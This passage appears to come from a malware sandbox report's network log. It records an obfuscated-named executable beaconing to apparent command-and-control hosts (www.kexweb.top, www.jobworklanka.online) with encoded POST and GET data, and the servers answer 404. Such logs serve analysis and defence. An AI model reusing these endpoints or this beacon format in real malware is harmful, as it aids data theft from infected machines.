              Data Raw: 30 74 68 34 53 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 76 61 79 57 38 35 50 54 53 4f 58 6c 31 71 6f 4e 63 70 6c 59 32 72 53 6b 72 79 33 66 64 6b 71 72 4d 45 62 71 68 7a 62 59 30 46 59 6e 64 6f 73 4f 41 45 51 71 4b 55 6e 6c 72 72 44 33 6b 5a 35 73 32 41 38 34 6e 6f 45 6e 67 45 77 5a 75 62 70 78 6e 7a 32 4d 6a 6f 4c 54 70 67 4a 42 5a 56 4f 79 44 56 45 6c 34 31 32 44 46 62 48 70 65 63 30 5a 45 51 6d 6d 6d 6c 4c 4f 4d 39 49 73 35 46 33 50 71 37 57 55 4e 78 54 45 63 55 58 4b 57 6c 74 32 4e 6b 78 6c 72 69 56 32 2f 5a 75 39 68 6f 6d 65 59 63 39 71 4e 42 4d 77 32 71 44 4c 6d 50 6a 4f 42 76 67 72 7a 41 3d 3d
              Data Ascii: 0th4S=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2NkxlriV2/Zu9homeYc9qNBMw2qDLmPjOBvgrzA==
              Sep 22, 2024 17:57:42.678194046 CEST595INHTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:57:42 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 389
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.114973263.250.47.40806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:44.600519896 CEST823OUTPOST /3bdq/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.kexweb.top
              Origin: http://www.kexweb.top
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 222
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.kexweb.top/3bdq/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 65 72 4c 68 6e 71 69 79 62 59 7a 46 59 6e 46 34 73 4c 4f 6b 51 68 4b 55 62 58 72 72 76 33 6b 61 46 73 32 42 4d 34 6d 66 51 34 68 55 77 62 69 37 70 7a 6f 54 32 4d 6a 6f 4c 54 70 67 74 6e 5a 52 61 79 44 6c 30 6c 2b 58 4f 4d 61 72 48 71 4b 4d 30 5a 58 41 6d 69 6d 6c 4b 2b 4d 38 55 53 35 44 7a 50 71 35 65 55 44 41 54 44 46 6b 57 42 59 46 74 34 4f 32 45 41 73 68 55 2b 32 35 6d 61 69 64 43 52 64 61 73 77 64 69 46 6e 31 35 4c 4a 79 70 43 2b 49 65 46 69 6f 45 41 6b 47 53 64 2b 34 4d 4f 43 6e 4c 4f 44 31 4b 74 52 34 78 49 3d
              Data Ascii: 0th4S=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWerLhnqiybYzFYnF4sLOkQhKUbXrrv3kaFs2BM4mfQ4hUwbi7pzoT2MjoLTpgtnZRayDl0l+XOMarHqKM0ZXAmimlK+M8US5DzPq5eUDATDFkWBYFt4O2EAshU+25maidCRdaswdiFn15LJypC+IeFioEAkGSd+4MOCnLOD1KtR4xI=
              Sep 22, 2024 17:57:45.203596115 CEST595INHTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:57:45 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 389
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.114973363.250.47.40806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:47.146550894 CEST1836OUTPOST /3bdq/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.kexweb.top
              Origin: http://www.kexweb.top
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1234
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.kexweb.top/3bdq/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 6d 72 4c 54 66 71 6c 6c 76 59 79 46 59 6e 62 6f 73 4b 4f 6b 51 47 4b 51 33 54 72 72 79 43 6b 63 4a 73 33 6e 77 34 68 72 38 34 72 55 77 62 71 62 70 2b 6e 7a 33 4d 6a 6f 62 58 70 67 39 6e 5a 52 61 79 44 6e 73 6c 70 56 32 4d 59 72 48 70 65 63 30 46 45 51 6d 4b 6d 68 66 47 4d 38 51 43 35 7a 54 50 72 5a 4f 55 42 79 37 44 61 55 57 44 62 46 73 2b 4f 32 59 54 73 68 49 59 32 36 37 50 69 62 79 52 66 4f 68 70 59 54 6c 4b 6a 59 62 38 74 61 32 64 41 2f 42 59 77 32 41 49 41 78 70 56 76 4a 32 73 73 34 2f 48 73 37 46 48 73 6e 71 59 35 36 35 56 51 35 44 31 73 33 4b 4d 58 64 75 52 78 38 2b 58 6b 56 4b 2b 32 38 5a 73 46 63 2b 34 34 2f 44 5a 31 67 33 65 69 78 43 4b 43 68 78 72 33 67 78 2f 65 62 35 66 37 6f 45 59 50 71 51 4e 66 68 42 77 4d 36 4c 58 72 50 74 47 61 47 64 47 6e 4d 2f 51 34 63 5a 72 4d 6c 55 59 67 58 57 34 62 66 76 67 2f 47 4e 2f 59 78 62 58 31 6b 45 4d 74 79 30 31 [TRUNCATED]
              Data Ascii: 0th4S=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWmrLTfqllvYyFYnbosKOkQGKQ3TrryCkcJs3nw4hr84rUwbqbp+nz3MjobXpg9nZRayDnslpV2MYrHpec0FEQmKmhfGM8QC5zTPrZOUBy7DaUWDbFs+O2YTshIY267PibyRfOhpYTlKjYb8ta2dA/BYw2AIAxpVvJ2ss4/Hs7FHsnqY565VQ5D1s3KMXduRx8+XkVK+28ZsFc+44/DZ1g3eixCKChxr3gx/eb5f7oEYPqQNfhBwM6LXrPtGaGdGnM/Q4cZrMlUYgXW4bfvg/GN/YxbX1kEMty01qsxIDS+OKENMZ97xavDtYkjIqIn96241FYVqGPNNO+dt9/1CVkKpiIwi3onLyuHbMrdseCLzyyZksP9fZuVNGqAvPp7rdSJYEYEurHAlOQpcbwCQsQTC5WpOeyqFwAtnzXbLJzHsRRD1+xv2xTEzjm8MW/pGPGz3s6ZtEyil+AM2Rp7nQBOqqXMiarzPQ2ONdUpG949q1V0w3Xq9LdmSg/yCGmrqMpejichncYeQ0x4fIvjXLb2vZ9tEOQCgin1SfpYNynBV/VGLR1jEuFJH5cGjPD4csBSqeBUQuRoKmYHfQkoIFNS0pg3txN60X/Tl/Vbw8f0RSWlXxJvyuESvRZsrVQ+x7cpwUhlyttv3iE79EUp97AuiqFkCqtVNbO7Rb5Gk8Jk73Jxt7hEJxcjkTHGBtIGjYldm4U9tkTMHOwSM410RnmPo60ZnR5um1ilWdMzwGI0rhk+wdYrYjfC0qLQQfCdxBiGAn5tqdc3og+aeWAq8eS0Qocz9oZN5TgbvfNt6cgfdtFjdKCBlpyzfROgkLUOqI8N2+ExCT7srVUtV38fgrCJu8QFXe8TIFRwvegKvdh/C1OLdY93sWBTap2ZpGADTKVWdIrHASvgVIbQVrU4o1SX/ERK7bquqvPfTQhAOxLQc3LBTrVTHpf6+9vzmBmJx5/g9h9 [TRUNCATED]
              Sep 22, 2024 17:57:47.725965023 CEST595INHTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:57:47 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 389
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              20192.168.2.114973463.250.47.40806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:49.690640926 CEST544OUTGET /3bdq/?0th4S=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exr1k3rbVGomG72bvSmTd+X16WAn8mpVexUKk=&u2pl=VvmP2xFp HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.kexweb.top
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:57:50.309072971 CEST610INHTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:57:50 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 389
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html; charset=utf-8
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              21192.168.2.114973591.184.0.200806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:55.377249956 CEST830OUTPOST /ikh0/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.jobworklanka.online
              Origin: http://www.jobworklanka.online
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 202
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.jobworklanka.online/ikh0/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 63 74 66 75 64 76 48 48 58 71 6c 57 47 2f 36 79 52 51 68 64 31 72 4c 32 54 43 2f 47 6a 49 6f 75 77 6e 30 42 37 36 65 65 6f 4f 64 61 35 6e 6c 47 55 39 6b 4d 33 69 4b 44 57 6a 61 49 70 48 63 30 44 79 41 4d 51 57 71 68 4c 6d 6d 4f 6f 4e 6f 6f 67 59 72 64 6a 77 74 51 35 6e 34 62 48 4c 70 71 39 77 48 74 69 68 6c 38 72 6c 78 35 52 63 49 4e 31 4f 33 31 68 69 62 31 6c 44 30 64 48 36 49 63 4f 2b 31 49 63 65 78 49 32 52 51 37 5a 57 54 48 32 50 75 41 55 66 63 6c 59 45 69 59 6a 61 6c 37 2b 63 50 51 2f 2f 72 2b 51 38 2f 56 6a 36 7a 70 31 71 41 54 41 3d 3d
              Data Ascii: 0th4S=otZcyeHXRsUakctfudvHHXqlWG/6yRQhd1rL2TC/GjIouwn0B76eeoOda5nlGU9kM3iKDWjaIpHc0DyAMQWqhLmmOoNoogYrdjwtQ5n4bHLpq9wHtihl8rlx5RcIN1O31hib1lD0dH6IcO+1IcexI2RQ7ZWTH2PuAUfclYEiYjal7+cPQ//r+Q8/Vj6zp1qATA==
              Sep 22, 2024 17:57:56.067904949 CEST500INHTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:57:55 GMT
              Server: Apache
              X-Xss-Protection: 1; mode=block
              Referrer-Policy: no-referrer-when-downgrade
              X-Content-Type-Options: nosniff
              X-Frame-Options: SAMEORIGIN
              Content-Length: 196
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              22192.168.2.114973691.184.0.200806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:57.945789099 CEST850OUTPOST /ikh0/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.jobworklanka.online
              Origin: http://www.jobworklanka.online
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 222
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.jobworklanka.online/ikh0/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 67 6f 76 52 58 30 41 36 36 65 54 49 4f 64 51 5a 6e 67 4c 30 39 37 4d 33 75 43 44 58 50 61 49 70 6a 63 30 44 43 41 4e 6e 69 70 6e 62 6d 6f 56 34 4e 51 6c 41 59 72 64 6a 77 74 51 35 79 6a 62 47 76 70 72 4e 41 48 76 48 4e 6b 32 4c 6c 77 70 78 63 49 66 46 4f 7a 31 68 6a 38 31 6b 65 54 64 42 32 49 63 4d 6d 31 49 4a 72 6e 44 32 51 36 31 35 58 5a 45 6d 72 2b 50 6b 32 72 68 37 41 4b 51 78 75 30 33 59 4e 56 41 63 32 38 39 44 30 39 42 46 62 44 67 45 50 4a 49 4a 7a 31 61 57 4a 52 65 4d 4a 70 43 6f 48 4b 53 79 41 31 51 77 51 3d
              Data Ascii: 0th4S=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGWgovRX0A66eTIOdQZngL097M3uCDXPaIpjc0DCANnipnbmoV4NQlAYrdjwtQ5yjbGvprNAHvHNk2LlwpxcIfFOz1hj81keTdB2IcMm1IJrnD2Q615XZEmr+Pk2rh7AKQxu03YNVAc289D09BFbDgEPJIJz1aWJReMJpCoHKSyA1QwQ=
              Sep 22, 2024 17:57:58.667346001 CEST500INHTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:57:58 GMT
              Server: Apache
              X-Xss-Protection: 1; mode=block
              Referrer-Policy: no-referrer-when-downgrade
              X-Content-Type-Options: nosniff
              X-Frame-Options: SAMEORIGIN
              Content-Length: 196
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              23192.168.2.114973791.184.0.200806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:00.491586924 CEST1863OUTPOST /ikh0/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.jobworklanka.online
              Origin: http://www.jobworklanka.online
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1234
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.jobworklanka.online/ikh0/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 34 6f 76 6a 66 30 41 5a 53 65 63 6f 4f 64 4c 5a 6e 68 4c 30 39 79 4d 7a 43 47 44 58 79 74 49 76 6e 63 79 67 36 41 45 7a 2b 70 70 62 6d 6f 63 59 4e 72 6f 67 59 2b 64 6a 41 70 51 35 69 6a 62 47 76 70 72 4f 59 48 6d 79 68 6b 77 4c 6c 78 35 52 63 45 4e 31 4f 58 31 6c 48 47 31 6b 61 70 63 78 57 49 62 73 32 31 45 62 44 6e 42 57 52 63 32 35 57 4d 45 6d 57 35 50 6b 36 64 68 36 45 67 51 79 2b 30 30 75 34 7a 46 6f 71 56 6b 46 77 53 52 30 58 66 39 55 36 4a 4e 49 50 43 52 57 56 47 49 38 5a 58 66 34 36 62 47 51 6b 2b 50 31 7a 4c 45 75 75 78 32 2f 34 32 35 69 79 59 52 66 34 41 79 7a 43 38 61 4d 4b 4e 68 31 35 6a 6d 5a 54 56 76 6b 32 48 2b 56 58 38 79 65 59 78 36 49 6a 36 61 79 4b 72 78 55 30 70 70 2f 67 59 42 47 38 36 31 6c 62 49 6f 46 35 2f 53 36 4d 66 33 68 67 5a 43 6e 4f 58 64 39 63 46 54 4e 6e 44 67 70 32 6f 74 47 53 6a 47 4b 39 69 33 54 32 6c 47 39 63 71 78 4b 58 7a [TRUNCATED]
